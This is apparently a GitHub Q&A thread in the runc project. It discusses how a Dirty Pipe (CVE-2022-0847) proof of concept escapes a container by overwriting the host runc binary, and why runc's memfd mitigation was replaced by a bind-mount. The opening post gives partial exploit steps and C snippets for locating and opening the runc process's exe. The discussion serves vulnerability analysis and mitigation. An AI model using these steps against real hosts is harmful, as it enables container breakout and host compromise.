### DISCUSSION TITLE
Why dirty pipe can escape container?

### DISCUSSION THREAD

**Discussion by g0dA** [opencontainers/runc#3423] [Q&A] [answered]
Overwriting /proc/runc pid/exe through dirty pipe(CVE-2022-0847) can cause container escape like CVE-2019-5736

But CVE-2019-5736 was fixed by memfd_create in commit [nsenter: clone /proc/self/exe to avoid exposing host binary to container](https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b)

For now i think /proc/runc pid/exe is an in-memory file, if we open it we can get fd created by `memfd_create`
in kernel :
```c
static int proc_exe_link(struct dentry *dentry, struct path *exe_path)
{
	struct task_struct *task;
	struct file *exe_file;

	task = get_proc_task(d_inode(dentry));
	if (!task)
		return -ENOENT;
	exe_file = get_task_exe_file(task);
	put_task_struct(task);
	if (exe_file) {
		*exe_path = exe_file->f_path;
		path_get(&exe_file->f_path);
		fput(exe_file);
		return 0;
	} else
		return -ENOENT;
}
```
`exe_file` is `task->mm->exe_file` and it It should be an in-memory file not a file on disk, so we shouldn't be able to overwrite the disk file by overwriting it

But my poc works and i don't know why

Steps :
1. `echo '#!/proc/self/exe' > /bin/sh`
2. search runc pid 
```c
	while (found == 0) {
		dir = opendir("/proc");
		while ((ptr = readdir(dir)) != NULL) {
			snprintf(path, sizeof(path), "/proc/%s/cmdline", ptr->d_name);
			if (isRuncProcess(path, "runc")) {
				found = atoi(ptr->d_name);
				printf("[+] Found the RUNC PID: %d\n", found);
				break;		
			}
		}
		closedir(dir);
	}
```
3. open /proc/runc pid/exe
```c
	int handleFd = -1;
	while (handleFd == -1) {
		snprintf(path, sizeof(path), "/proc/%d/exe", found);
		handleFd = open(path, O_RDONLY);
	}	
```
4. runc exec -t test /bin/sh
5. splice + write overwrite

**Comment by cyphar** [comment, marked as answer]
Because of many complaints by Kubertnetes folks, we switched to making /proc/self/exe a read-only bind-mount. The memfd logic still exists but it's only exercised by rootless containers.

It's pretty frustrating that I implemented a protection against this precise issue which we were forced to disable because Kubertnetes integration tests started failing (copying the binary increases memory usage by a few MB and the Kubertnetes tests had tiny memory limits).

**Comment by g0dA** [comment]
Oh my god, it looks like this, no wonder the actual performance of runc is not the same as the previous fix report.

Then I have a new question :
https://github.com/opencontainers/runc/blob/98b75befc44c8f0f4a76e7cf8f100be834e624e8/libcontainer/nsenter/cloned_binary.c#L510

by `sendfile()` memfd and binfd are the same page cache，if the pagecache of memfd is modified through dirtypipe, it will also cause the container to escape

Am I right?

**Reply by cyphar** [reply]
I'm not sure about that. I don't know if `sendfile` (which uses `splice` internally on an in-kernel private pipe) will result in the page cache being shared. I feel like the answer should be no because `sendfile` can be used for non-`PAGE_SIZE` offsets and lengths, but it's possible Linux is being too clever for its own good here. The `sendfile(2)` manpage (unsurprisingly) doesn't say whether or not the page cache would be shared after `sendfile`.

**Reply by cyphar** [reply]
If you have a PoC, have you tried modifying `cloned_binary.c` so that we always use a memfd and then try the PoC again?

**Reply by brant-ruan** [reply]
According to [experiments](https://terenceli.github.io/技术/2022/03/19/container-escape-through-dirtypipe) from @terenceli, using memfd and `sendfile` will cause PoC fails.

**Reply by cyphar** [reply]
Thanks, good to know.

**Comment by kings-way** [comment]
related:  #1984 [nsenter: cloned_binary: "memfd" cleanups](https://github.com/opencontainers/runc/pull/1984)

**Comment by christophetd** [comment]
For what it's worth, we published a container escape PoC based on overwriting the runC binary: https://github.com/DataDog/dirtypipe-container-breakout-poc

We did confirm that using a modified runC version cloning the binary instead of bind-mounting it does cause it to fail

**Reply by cyphar** [reply]
Yeah it seems like revisiting this might be a good idea, but a 10mb bump in container memory requirements is probably not going to make people happy (and it's not obvious how we should make it optional...)
